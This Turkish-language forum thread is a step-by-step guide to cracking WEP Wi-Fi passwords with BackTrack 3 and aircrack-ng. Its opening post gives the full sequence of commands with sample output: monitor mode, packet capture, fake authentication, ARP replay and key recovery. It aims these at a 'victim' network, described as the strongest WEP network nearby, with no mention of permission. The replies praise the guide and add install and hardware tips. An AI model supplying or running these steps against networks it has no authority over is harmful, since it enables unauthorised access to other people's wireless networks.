WLAN Password Cracking -1- [WEP]

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    CommunisT
    CommunisT's avatar
    Kayıt Tarihi: 04/Ocak/2006
    Erkek

    Merhabalar,
    wireless aglarina son dönemde cogalan ilgiden ötürü ve bircok kez crack nasil yapilir sorulari üzerine bu konuya el atmak istedim.

    Öncelikle sunu acikliyayim.
    Spoof ve Crack islemlerinde linux olmazsa olmaz gereksinimlerdendir.
    Linux`u zor, anlasilmaz sadece elit kisilerin kullanabilecegi görüntüsü bircok kisinin beynine islemis nedense.
    Bu tabuyu asmaliyiz.

    Baslangic icin Wep sifreleme algoritmasina deginmemin sebebi, bu sifreleme sisteminin en kolay kirilmasindan dolayidir. Wpa algoritmasina ileriki asamalarda deginecegim.

    Wireless sifre kirmasinin genel mantigi , hedefin mac adresi snifflenir, gidip gelen paketleri toplanilir, yeterli paket elde edildiginde mac adresi kopyalanir ve sifre elde edilir.

    Herseyin kolaylastigi bu dönemlerde, bu islemi yapmak icin sadece 5 dk bile yeterli olmaktadir.
    Bu konu üzerine tasarlanmis olan BackTrack 3 linux modu, wireless cracking icin hertürlü yazilimi sunmaktadir.

    Crackinge baslamadan önce gereken temel 2 gereksinim var.
    1- BackTrack 3http://remote-exploit.org/cgi-bin/fileget?version=bt3-cd

    2- BackTrack 3 ile uyumlu calisan bir wireless karti.http://backtrack.offensive-security.com/index.php?title=HCL:Wireless

    Download adresi:

    Uyumlu kart listesi:

    A)


    Ilk olarak BackTrack 3 ü indirin, boot cd olarak cd ye kaydedin.
    Bilgisayari cd`den baslatin.
    Sistem tam olarak acilana kadar sürekli enter tusuna basili tutun.

    B)
    Menüden wlan monitöre girin ve cevrenizdeki wep olan wireless noktalarindan sinyali en yüksek olaninin mac adresini kopyalayin.

    C)
    Simdi crack islemine basliyabiliriz.
    Öncelikle hangi bilgileri kullanacagimizi belirliyelim.

    Kendi MAC Adresimiz: 00:0R:E0:00:D0:00

    BSSID (Kurbanin MAC Adresi): 00:MI:LI:TA:N1:11

    ESSID (Kurbanin Baglantisinin ismi): kurbanttnet

    Access point kanali: 9

    Wireless arayüzü: ath0

    Bu veriler crack isleminde kullanilmis olan örnek veriler. Bunlari birebir kendi bilgilerinizle degistirmeniz gerekiyor.

    #####################################################################

    A)

    Simdi sirayla su islemleri yapin.

     

    1-

    Konsol u baslatin ve sunu yazin.

    airmon-ng stop ath0

    Suna benzer bir cevap gelmeli

     

    Interface Chipset Driver

    wifi0 Atheros madwifi-ng

    ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)

    2-

    Simdi sunu yazin

    iwconfig

    Suna benzer bir cevap gelmeli

     

    lo no wireless extensions.

    eth0 no wireless extensions.

    wifi0 no wireless extensions.

    3-

    Simdi sunu yazin

    airmon-ng start wifi0 9

    Suna benzer bir cevap gelmeli

     

    Interface Chipset Driver

    wifi0 Atheros madwifi-ng

    ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

    4-

    Tekrardan sunu yazin

    iwconfig

    Suna benzer bir cevap gelmeli

    lo no wireless extensions.

    wifi0 no wireless extensions.

    eth0 no wireless extensions.

    5-

    Simdi sunu yazin

    ath0 IEEE 802.11g ESSID:"" Nickname:"" Mode:Monitor Frequency:2.452 GHz Access Point: 00:0R:E0:00:D0:00 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0

     

    airodump-ng -c 9 --bssid 00:MI:LI:TA:N1:11 -w output ath0

    Suna benzer bir cevap gelmeli

    CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP kurbanttnet

    BSSID STATION PWR Lost Packets Probes

    00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782

    Konsol penceresini kenara cekin , isleme devam etsin.

    Buraya kadar hersey yolunda ise crack islemini yapmamiza az kaldi.

    B)

    Yeni bir konsol penceresi acin.

    Sunu yazin

    aireplay-ng -1 0 -e kurbanttnet -a 00:MI:LI:TA:N1:11 -h 00:0R:E0:00:D0:00 ath0

    Söyle bir cevap gelmeli

    18:18:20 Sending Authentication Request

    18:18:20 Authentication successful

    18:18:20 Sending Association Request

    18:18:20 Association successful :-)

     

    C)

    Yeni bir konsol penceresi daha acin.

    Sunu yazin

    aireplay-ng -3 -b 00:MI:LI:TA:N1:11 -h 00:0R:E0:00:D0:00 ath0

    Söyle bir cevap gelmeli

    Saving ARP requests in replay_arp-0321-191525.cap

    You should also start airodump-ng to capture replies.

    Read 629399 packets (got 316283 ARP requests), sent 210955 packets...

    D)

    Yeni bir konsol penceresi daha acin.

    Sunu yazin

    aircrack-ng -z -b 00:MI:LI:TA:N1:11 output*.cap

    Bu noktadan sonra eger yeterli paket elde edildiyse söyle bir cevap gelecektir.

    Aircrack-ng 0.9 [00:03:06] Tested 674449 keys (got 96610 IVs) KB depth byte(vote) 0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0) 1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12) 2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10) 3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15) KEY FOUND! [ 12:34:56:78:90 ] Probability: 100%

    Eger böyle bir cevap elde edemediyseniz, ayni islemi daha fazla paket elde ettikten sonra tekrarlayiniz.
    Ne kadar fazla paket elde ettiyseniz , sifrenin kirilmasi kesinlesecektir.

    Kolay Gelsin.


    Bitimsiz bir ko$udur ya$am
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Triumph
    Triumph's avatar
    Kayıt Tarihi: 29/Mayıs/2004
    Erkek

    vdsl'de geldi yaa.şimdi wireless hacking olayları çok daha merak cezbedecek.

  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ertan
    ertan's avatar
    Kayıt Tarihi: 21/Temmuz/2005
    Erkek

    güzel bir döküman hazırlamışsın ellerine sağlık.. keşke resimli hazırlasaydın.. Adminlerden rica edip döküman arşivine koydururduk..


    Bundan sonra sadece insan olanlarla muhattap olacağım.. Ona göre karşıma gelin...
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    fenerist07
    fenerist07's avatar
    Kayıt Tarihi: 09/Ağustos/2005
    Erkek

    cd den fln boot edilebilen linuxlerden yapabilrmiyik bunu.linux cahiliymde ayıptır sölemesi


    Amphetamine Logic.
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    CommunisT
    CommunisT's avatar
    Kayıt Tarihi: 04/Ocak/2006
    Erkek

    ertan bunu yazdı:
    -----------------------------

    güzel bir döküman hazırlamışsın ellerine sağlık.. keşke resimli hazırlasaydın.. Adminlerden rica edip döküman arşivine koydururduk..


    -----------------------------
    tsk dostum. kodlari mecbur yazmak gerektiginden dolayi,görsel pek bir islevi olmadigindan gerek duymadim acikcasi.

     

    fenerist07 bunu yazdı:
    -----------------------------

    cd den fln boot edilebilen linuxlerden yapabilrmiyik bunu.linux cahiliymde ayıptır sölemesi


    -----------------------------
    evet yapabilirsin. backtrack zaten boot yapilan linux.


    Bitimsiz bir ko$udur ya$am
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Böcüklerin Efendisi
    krypt
    krypt's avatar
    Kayıt Tarihi: 05/Mart/2004
    Erkek

    Hocam şunu yazın bunu yazın yerine neden yazıldığını analtsan daha faydalı olabilirdi. Uğraşmışsın eline sağlık.


    while (1<2)
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    CommunisT
    CommunisT's avatar
    Kayıt Tarihi: 04/Ocak/2006
    Erkek

    KrypT bunu yazdı:
    -----------------------------

    Hocam şunu yazın bunu yazın yerine neden yazıldığını analtsan daha faydalı olabilirdi. Uğraşmışsın eline sağlık.


    -----------------------------
    tsk.mantigini bilen zaten bu döküma ihtiyaci olmaz diye düsünüyorum.
    tek tek islemin ne yaptigini yazmamda pek bir ise yaramaz, sonucta hazir yazirmis bir codlamaya sadece start emri veriyorsun.
    giriste özet olarak genel mantiga degindim. yeterlidir umarim.


    Bitimsiz bir ko$udur ya$am
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    G-Turk
    G-Turk's avatar
    Kayıt Tarihi: 06/Ağustos/2006
    Erkek

    WLAN hack'e basit bir giris.
    Bircok yöntemden tekini vermissin. Bu yöntemle eger kablosuz agda trafik yaratan bir kullanici varsa IVs toplayabilirsin.

    Örnegin kullanici yoksa, bambaska yol izlemen gerekebiliyor yada fakeauth yöntemi calismassa.
    Birde hedef aga uzaktaysan paket toplamani etkiliyor.

    Arkadaslar ekstra BackTrack indirmenize gerek yok.
    Pardus kullaniyorsaniz konsoldan

    sudo pisi ar http://url

    ile Pardusun contrib deposunu kurun, ondan sonrada

    sudo pisi it aircrack-ng

    Böylece Pardus altinda bu islemleri yapabilirsiniz.
    Birde not düseyim, kablosuz aglar kirabilmeniz icin uygun bir donanima ihtiyaciniz var.
    Cipseti Atheros veya Prism olan Wireless USB adaptörleri veya PCMCIA kartlari ile yapabilirsiniz.

    Bu arada güzel paylasimindan dolayi tesekkürler.


    # Taşı delen suyun kuvveti değil, damlaların sürekliliğidir
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    CommunisT
    CommunisT's avatar
    Kayıt Tarihi: 04/Ocak/2006
    Erkek

    Tsk.Bu konuda G-Turk`ten destek alabilirsiniz bu arada arkadaslar. Uzmanlik alanina girer.
    Basliga bende Red Tahribat mi yazsaydim acaba :)


    Bitimsiz bir ko$udur ya$am
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    nickneyime
    nickneyime's avatar
    Kayıt Tarihi: 16/Temmuz/2003
    Erkek

    saolasın hojam güsel bi döküman olmuş.herkesin merak ettiği bi konu.chipsetim uysa bnde indirip bol bol deneme yapcam ama chipsetten kaybbediom.şimdi gidip chipseti uyumlu bi kart alamam  :|


    bunch of idiots around me, yes everywhere.
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    mostwanted
    mostwanted's avatar
    Kayıt Tarihi: 02/Temmuz/2008
    Erkek
    emeğine sağlık güzel paylaşım
Toplam Hit: 4664 Toplam Mesaj: 12